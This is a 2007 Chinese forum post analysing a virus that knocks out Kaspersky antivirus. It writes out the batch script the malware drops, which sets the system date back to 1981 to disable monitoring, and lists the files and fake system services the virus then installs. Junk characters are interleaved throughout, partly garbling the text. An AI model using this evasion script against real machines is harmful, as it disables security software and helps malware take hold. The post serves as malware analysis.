|
|
|
今天拿到个小病毒..玩了一下下...按某论坛某人的帖得到结果如下5 {7 ~: s! p) y( t
/ }" [8 E; G, H$ _2如果没有安装卡巴斯基,直接运行病毒代码
- i' ^) w& W9 Y# L! u9 ~3如果发现安装卡巴斯基,则先释放一个批处理(.bat)文件,注意卡巴的主动防御并没有吹嘘的那么好,对此代码完全是放纵不管!!代码很简单,如下:
7 y% e- d% }5 z' A! I, [ @echo off( N* {; j! D! B0 m
set date=%date%
! f" |2 W9 |" [5 i" ? date 1981-1-12
1 c2 O# s& v: i. W( s. v ping -n 45 localhost > nul
- T: p7 F/ F; Z% I1 H ? date %date%; @9 O0 s0 S% G( A# L4 g6 f
del %0
# q$ I' }9 E+ P
1 j. d' [2 u+ ]; R 会发现系统时间被调整到了1981年1月12日(时间没变,日期变了),这时,卡巴斯基的监控立刻失效,在成功完成Over掉卡巴斯基后,病毒释放如下文件
% U9 _/ u8 j) c9 Z0 ] %SystemRoot%\system32\*.EXE2 k# G4 P# B8 h; b' p! V
%SystemRoot%\system32\*T.EXE
& p5 S3 d/ }* d %SystemRoot%\system32\*.DLL
b! z, S) h- [1 T1 ^ %SystemRoot%\system32\delme.bat
6 Q; l1 n7 j0 R: o( r (注:*为随机8位字母)
4 \% p6 K4 W0 o" o 并在注册表HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\添加若干伪系统服务,至此,病毒成功运行!可以说,卡巴斯基被秒杀,一点反抗能力也没有。* ~& I0 m7 ?+ u
其实,这个Bug早已存在,但卡巴斯基一直没有修正,直至现在出现了利用这个Bug的病毒
3 k$ P, ~4 u4 c# _1 W; ~# [
# i' |, s$ Q* z9 N |
|
雷达卡
发表于 2007-10-26 18:26:44
提升卡
抢沙发